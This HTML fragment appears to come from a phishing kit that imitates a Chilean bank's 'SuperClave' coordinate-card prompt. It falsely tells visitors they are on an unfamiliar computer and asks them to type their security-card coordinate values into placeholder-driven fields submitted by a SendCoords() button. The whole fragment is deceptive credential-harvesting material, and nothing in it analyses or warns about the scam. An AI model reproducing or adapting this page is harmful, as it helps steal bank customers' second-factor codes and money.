    <input type="hidden" id="modulo" name="modulo" value="<!--modulo-->">
      <input  type="hidden" name="coord[Coordenadas]" value="Randon Coord!">
          <h1><img src="../../../pagina/images/panel/icn-candado.png" width="25" height="25"><strong>Confirmar operaci&oacute;n <!--title--></strong></h1>
			<h3>No est&aacute;s operando desde tu computador habitual, por favor ingresa tu <strong>Super Clave</strong> para continuar con el ingreso a tus cuentas.</h3>
              
              <p>(*)Sus datos son importantes, para poder acceder a esa funcionalidad se requiere validaci&oacute;n con SuperClave</p>
          <table width="190" border="0" align="center" cellpadding="0" cellspacing="0">
            <tr>
              <td width="20" height="20">
				<img src="../../../pagina/images/panel/lateral01.png" width="20" height="20" border="0"></td>
              <td width="150"  height="20" bgcolor="#CD3833"><font size="1" face="Tahoma" color="#FFFFFF">Aseg&uacute;rese que el n&uacute;mero de serie de su <strong><!--NumbCoords--></strong></font></td>
              <td width="20"  height="20">
				<img src="../../../pagina/images/panel/lateral02.png" width="20" height="20" border="0"></td>
            </tr>
            <tr>
              <td bgcolor="#CD3833"></td>
              <td width="12"><!--Coords--></td>
              <td bgcolor="#CD3833"></td>
            </tr>
            <tr>
              <td  height="20" width="20">
				<img src="../../../pagina/images/panel/lateral03.png" width="20" height="20" border="0"></td>
              <td   height="20" bgcolor="#CD3833"> 
			  <font size="1" face="Tahoma" color="#FFFFFF">Si es as&iacute;, ingrese el valor de las siguientes coordenadas</font> </td>
              <td   height="20" width="20">
				<img src="../../../pagina/images/panel/lateral04.png" width="20" height="20" border="0"></td>
            </tr>
          </table>
            <h2 id="coord-info"><!--Mensaje--></h2>
          <p><input type="image" src="../../../pagina/images/panel/siguiente.jpg" onclick="SendCoords();"></p>